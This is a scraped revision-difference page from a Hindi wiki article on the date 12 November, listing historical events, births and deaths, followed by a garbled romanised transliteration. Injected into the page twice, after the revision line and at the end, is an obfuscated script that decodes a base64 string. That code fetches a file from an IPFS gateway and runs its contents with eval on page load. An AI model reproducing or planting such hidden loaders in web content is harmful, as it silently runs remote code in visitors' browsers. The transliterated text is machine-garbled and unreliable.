Difference between revisions of "12 नवंबर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(11 intermediate revisions by 5 users not shown)
Line 4: Line 4:
  
 
==12 नवंबर की महत्त्वपूर्ण घटनाएँ==
 
==12 नवंबर की महत्त्वपूर्ण घटनाएँ==
* 1781 - अंग्रेजो ने नागापट्टनम पर कब्जा किया।
+
* 1781 - अंग्रेजो ने नागापट्टनम पर क़ब्ज़ा किया।
 
* 1847 - [[ब्रिटेन]] के चिकित्सक सर जेम्स यंग सिंप्सन ने बेहोशी की दवा के रूप में पहली बार क्लोरोफार्म का प्रयाेग किया।
 
* 1847 - [[ब्रिटेन]] के चिकित्सक सर जेम्स यंग सिंप्सन ने बेहोशी की दवा के रूप में पहली बार क्लोरोफार्म का प्रयाेग किया।
 
* [[1918]] - ऑस्ट्रिया एक गणतंत्र बना।
 
* [[1918]] - ऑस्ट्रिया एक गणतंत्र बना।
Line 13: Line 13:
 
* [[1956]] - मोरक्को, सूडान और ट्यूनिशिया संयुक्त राष्ट्र में शामिल हुए।
 
* [[1956]] - मोरक्को, सूडान और ट्यूनिशिया संयुक्त राष्ट्र में शामिल हुए।
 
* [[1963]] - जापान में ट्रेन दुर्घटना में 164 लोग मारे गये।
 
* [[1963]] - जापान में ट्रेन दुर्घटना में 164 लोग मारे गये।
 +
* [[1967]] - इंदिरा गाँधी को प्रधानमंत्री पद पर रहते हुए पार्टी से निष्कासित कर दिया।
 +
* [[1969]] - प्रधानमंत्री इंदिरा गांधी को कांग्रेस की प्राथमिक सदस्यता से अलग करने की घोषणा की गई थी।
 
* [[1974]] - दक्षिण अफ्रीका नस्लीय नीतियों के कारण संयुक्त राष्ट्र महासभा से निलंबित।
 
* [[1974]] - दक्षिण अफ्रीका नस्लीय नीतियों के कारण संयुक्त राष्ट्र महासभा से निलंबित।
 
* [[1990]] - [[जापान]] में सम्राट आकिहितो का परम्परानुसार सिंहासनरोहण।  
 
* [[1990]] - [[जापान]] में सम्राट आकिहितो का परम्परानुसार सिंहासनरोहण।  
Line 22: Line 24:
 
* [[2008]] - [[भारतीय रिजर्व बैंक]] ने [[महाराष्ट्र]] के अदलपुर अर्बन कोआपरेटिव बैंक का लाइसेंस रद्द किया। परमाणु हथियार ले जाने में सक्षम के-15 का बालासोर से सफल परीक्षण किया गया। देश का पहला मानव रहित अंतरिक्ष यान-1 चन्द्रमा की अन्तिम कक्षा में स्थापित हुआ।
 
* [[2008]] - [[भारतीय रिजर्व बैंक]] ने [[महाराष्ट्र]] के अदलपुर अर्बन कोआपरेटिव बैंक का लाइसेंस रद्द किया। परमाणु हथियार ले जाने में सक्षम के-15 का बालासोर से सफल परीक्षण किया गया। देश का पहला मानव रहित अंतरिक्ष यान-1 चन्द्रमा की अन्तिम कक्षा में स्थापित हुआ।
 
* [[2009]] - [[भारत]] में पर्यटन को बढ़ावा देने के लिए केंद्र सरकार के 'अतुल्य भारत' अभियान को वल्ड ट्रेवल अवार्ड-2009 से नवाजा गया।
 
* [[2009]] - [[भारत]] में पर्यटन को बढ़ावा देने के लिए केंद्र सरकार के 'अतुल्य भारत' अभियान को वल्ड ट्रेवल अवार्ड-2009 से नवाजा गया।
 +
 
==12 नवंबर को जन्मे व्यक्ति==
 
==12 नवंबर को जन्मे व्यक्ति==
 +
* [[1966]] - [[राजीव संधू]] - '[[महावीर चक्र]]' से सम्मानित भारतीय सैन्य अधिकारी थे।
 +
* [[1943]] - [[बी. एन. सुरेश]] - [[भारत]] के प्रसिद्ध अंतरिक्ष वैज्ञानिक हैं।
 
* [[1896]] - [[सालिम अली]], भारतीय पक्षी विज्ञानी और प्रकृतिवादी
 
* [[1896]] - [[सालिम अली]], भारतीय पक्षी विज्ञानी और प्रकृतिवादी
 
* [[1940]] - [[अमजद ख़ान]], प्रसिद्ध अभिनेता।
 
* [[1940]] - [[अमजद ख़ान]], प्रसिद्ध अभिनेता।
 +
* [[1934]] - [[दिलीप महलानबीस]] - भारतीय बाल रोग विशेषज्ञ थे, जिन्हें डायरिया संबंधी बीमारियों के इलाज के लिए ओआरएस के उपयोग की शुरुआत करने के लिए जाना जाता है।
 +
* [[1915]] - [[अख़्तरुल ईमान]] - [[उर्दू]] [[नज़्म]] के नए मानक स्थापित करने वाले अद्वितीय शायर थे।
 +
* [[1911]] - [[अमलप्रवा दास]] - एक प्रमुख सामाजिक कार्यकर्ता थीं।
  
 
==12 नवंबर को हुए निधन==
 
==12 नवंबर को हुए निधन==
* [[1946]] - [[मदनमोहन मालवीय]] - महान स्वतंत्रता सेनानी, राजनीतिज्ञ, शिक्षाविद और एक बड़े समाज सुधारक भी थे।
+
* [[1946]] - [[मदनमोहन मालवीय]] - महान् स्वतंत्रता सेनानी, राजनीतिज्ञ, शिक्षाविद और एक बड़े समाज सुधारक भी थे।
 +
* [[1986]] - [[भुवनेश्वर प्रसाद सिन्हा]] - [[भारत]] के भूतपूर्व छठवें [[भारत के मुख्य न्यायाधीश|मुख्य न्यायाधीश]] थे।
 +
* [[2012]] - [[लल्लन प्रसाद व्यास]] - भारत के जाने-माने समाज सुधारक थे।
 +
* [[2018]] - अनंत कुमार - बेंगलुरु दक्षिण लोकसभा सीट से सांसद थे।
 +
* [[2020]] - [[आसिफ़ बसरा]] - भारतीय सिने अभिनेता और टीवी कलाकार थे।
  
 
==12 नवंबर के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==12 नवंबर के महत्त्वपूर्ण अवसर एवं उत्सव==

Latest revision as of 07:59, 12 March 2024

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 12 navanbar varsh ka 316 vaan (lip varsh mean yah 317 vaan) din hai. sal mean abhi aur 49 din shesh haian.

12 navanbar ki mahattvapoorn ghatanaean

  • 1781 - aangrejo ne nagapattanam par qabza kiya.
  • 1847 - briten ke chikitsak sar jems yang sianpsan ne behoshi ki dava ke roop mean pahali bar kloropharm ka prayaeg kiya.
  • 1918 - aaustriya ek ganatantr bana.
  • 1925 - amerika aur itali ne shaanti samajhaute par hastakshar kiye.
  • 1930 - landan mean pahali bar golamej sammelan ki shuruaat isamean 56 bharatiy aur 23 british pratinidhiyoan ne hissa liya lekin bharatiy rashtriy kaangres ka koee sadasy shamil nahian hua.
  • 1936 - keral ke mandir sabhi hianduoan ke lie khule.
  • 1953 - ijarail ke pradhanamantri devid ben guriyan ne apane pad se istipha diya.
  • 1956 - morakko, soodan aur tyoonishiya sanyukt rashtr mean shamil hue.
  • 1963 - japan mean tren durghatana mean 164 log mare gaye.
  • 1967 - iandira gaandhi ko pradhanamantri pad par rahate hue parti se nishkasit kar diya.
  • 1969 - pradhanamantri iandira gaandhi ko kaangres ki prathamik sadasyata se alag karane ki ghoshana ki gee thi.
  • 1974 - dakshin aphrika nasliy nitiyoan ke karan sanyukt rashtr mahasabha se nilanbit.
  • 1990 - japan mean samrat akihito ka paramparanusar sianhasanarohan.
  • 1995 - naijiriya rashtramandal ki sadasyata se nilanbit.
  • 2001 - nyooy aaurk mean ameriki eyaralaians ka viman durghatanagrast hone se usamean savar sabhi 260 yatri mare ge.
  • 2002 - sanyukt rashtr ne svitajaralaiand ke sanghiy dhaanche ke adhar par saipras ke lie ek nayi shaanti yojana taiyar ki.
  • 2005 - dhaka mean 13vaan dakshes shikhar sammelan prarambh. bharatiy pradhanamantri ne dakshes shikhar sammelan ke dauran atankavad ko samapt karane ka ahvan kiya.
  • 2007 - soodi ke rajakumar alavalid suparajanbo eyar bas e-380 ke pahale kharidadar bane.
  • 2008 - bharatiy rijarv baiank ne maharashtr ke adalapur arban koaparetiv baiank ka laiseans radd kiya. paramanu hathiyar le jane mean saksham ke-15 ka balasor se saphal parikshan kiya gaya. desh ka pahala manav rahit aantariksh yan-1 chandrama ki antim kaksha mean sthapit hua.
  • 2009 - bharat mean paryatan ko badhava dene ke lie keandr sarakar ke 'atuly bharat' abhiyan ko vald treval avard-2009 se navaja gaya.

12 navanbar ko janme vyakti

12 navanbar ko hue nidhan

12 navanbar ke mahattvapoorn avasar evan utsav

  • rashtriy pakshi divas (salim ali ka janm divas)

bahari k diyaan


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>